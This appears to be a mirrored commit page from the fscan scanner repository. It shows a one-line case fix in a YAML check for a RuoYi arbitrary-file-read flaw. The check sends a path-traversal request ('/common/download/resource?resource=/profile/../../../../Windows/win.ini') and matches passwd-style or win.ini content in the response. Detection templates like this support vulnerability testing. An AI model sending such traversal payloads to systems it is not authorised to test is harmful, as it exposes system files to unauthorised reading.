mirror of
https://github.com/shadow1ng/fscan.git
synced 2025-07-14 05:12:36 +08:00
Update ruoyi-management-fileread.yml
This commit is contained in:
parent
2c1bdd98ee
commit
6ee7bab188
@ -7,7 +7,7 @@ groups:
|
|||||||
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
|
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
|
||||||
windows:
|
windows:
|
||||||
- method: GET
|
- method: GET
|
||||||
path: /Common/download/resource?resource=/profile/../../../../Windows/win.ini
|
path: /common/download/resource?resource=/profile/../../../../Windows/win.ini
|
||||||
expression: |
|
expression: |
|
||||||
response.status == 200 && response.body.bcontains(b"for 16-bit app support")
|
response.status == 200 && response.body.bcontains(b"for 16-bit app support")
|
||||||
detail:
|
detail:
|
||||||
|
Loading…
Reference in New Issue
Block a user